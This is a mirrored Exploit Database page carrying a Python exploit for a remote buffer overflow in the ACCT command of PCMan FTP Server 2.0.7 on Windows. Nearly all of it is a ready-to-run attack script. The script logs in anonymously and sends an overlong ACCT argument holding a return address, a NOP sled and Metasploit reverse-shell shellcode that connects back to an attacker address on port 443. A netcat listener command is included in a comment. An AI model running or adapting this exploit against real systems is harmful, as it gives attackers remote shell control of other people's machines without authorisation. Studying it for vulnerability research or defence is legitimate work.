PCMan FTP Server 2.0.7 – ‘ACCT’ Remote Buffer Overflow

• Exploit Database
• 19 阅读

• 作者： Cybernetic
  日期： 2016-11-03
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40704/

• #!/usr/bin/env python
  #-*- coding: utf-8 -*-
  
  # Exploit Title: PCMan FTP Server 2.0 ACCT Command Buffer Overflow Exploit
  # Date: 3/11/2016
  # Exploit Author: Cybernetic
  # Version: 2.0
  # Tested on: Windows XP Profesional SP3 ESP x86
  # CVE : N/A
  
  import socket, os, sys
  ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7
  
  #Metasploit Shellcode
  #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
  
  #nc -lvp 443
  #Send exploit
  
  shellcode=("\xba\xac\x84\x20\xa3\xda\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
  "\x52\x31\x57\x12\x83\xc7\x04\x03\xfb\x8a\xc2\x56\xff\x7b\x80"
  "\x99\xff\x7b\xe5\x10\x1a\x4a\x25\x46\x6f\xfd\x95\x0c\x3d\xf2"
  "\x5e\x40\xd5\x81\x13\x4d\xda\x22\x99\xab\xd5\xb3\xb2\x88\x74"
  "\x30\xc9\xdc\x56\x09\x02\x11\x97\x4e\x7f\xd8\xc5\x07\x0b\x4f"
  "\xf9\x2c\x41\x4c\x72\x7e\x47\xd4\x67\x37\x66\xf5\x36\x43\x31"
  "\xd5\xb9\x80\x49\x5c\xa1\xc5\x74\x16\x5a\x3d\x02\xa9\x8a\x0f"
  "\xeb\x06\xf3\xbf\x1e\x56\x34\x07\xc1\x2d\x4c\x7b\x7c\x36\x8b"
  "\x01\x5a\xb3\x0f\xa1\x29\x63\xeb\x53\xfd\xf2\x78\x5f\x4a\x70"
  "\x26\x7c\x4d\x55\x5d\x78\xc6\x58\xb1\x08\x9c\x7e\x15\x50\x46"
  "\x1e\x0c\x3c\x29\x1f\x4e\x9f\x96\x85\x05\x32\xc2\xb7\x44\x5b"
  "\x27\xfa\x76\x9b\x2f\x8d\x05\xa9\xf0\x25\x81\x81\x79\xe0\x56"
  "\xe5\x53\x54\xc8\x18\x5c\xa5\xc1\xde\x08\xf5\x79\xf6\x30\x9e"
  "\x79\xf7\xe4\x31\x29\x57\x57\xf2\x99\x17\x07\x9a\xf3\x97\x78"
  "\xba\xfc\x7d\x11\x51\x07\x16\xde\x0e\x06\xa1\xb6\x4c\x08\x2c"
  "\xfc\xd8\xee\x44\x12\x8d\xb9\xf0\x8b\x94\x31\x60\x53\x03\x3c"
  "\xa2\xdf\xa0\xc1\x6d\x28\xcc\xd1\x1a\xd8\x9b\x8b\x8d\xe7\x31"
  "\xa3\x52\x75\xde\x33\x1c\x66\x49\x64\x49\x58\x80\xe0\x67\xc3"
  "\x3a\x16\x7a\x95\x05\x92\xa1\x66\x8b\x1b\x27\xd2\xaf\x0b\xf1"
  "\xdb\xeb\x7f\xad\x8d\xa5\x29\x0b\x64\x04\x83\xc5\xdb\xce\x43"
  "\x93\x17\xd1\x15\x9c\x7d\xa7\xf9\x2d\x28\xfe\x06\x81\xbc\xf6"
  "\x7f\xff\x5c\xf8\xaa\xbb\x6d\xb3\xf6\xea\xe5\x1a\x63\xaf\x6b"
  "\x9d\x5e\xec\x95\x1e\x6a\x8d\x61\x3e\x1f\x88\x2e\xf8\xcc\xe0"
  "\x3f\x6d\xf2\x57\x3f\xa4")
  
  shell= '\x90'*30 + shellcode
  buffer='\x41'*2007+ ret + shell + '\x43'*(696-len(shell))
  
  print "Sending Buffer"
  
  s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  connect=s.connect(('10.10.1.10',21))
  s.recv(1024)
  s.send('USER anonymous\r\n')
  s.recv(1024)
  s.send('PASS anonymous\r\n')
  s.recv(1024)
  s.send('ACCT' +buffer+ '\r\n')
  s.close()
  
  print "Attack Buffer Overflow Successfully Executed"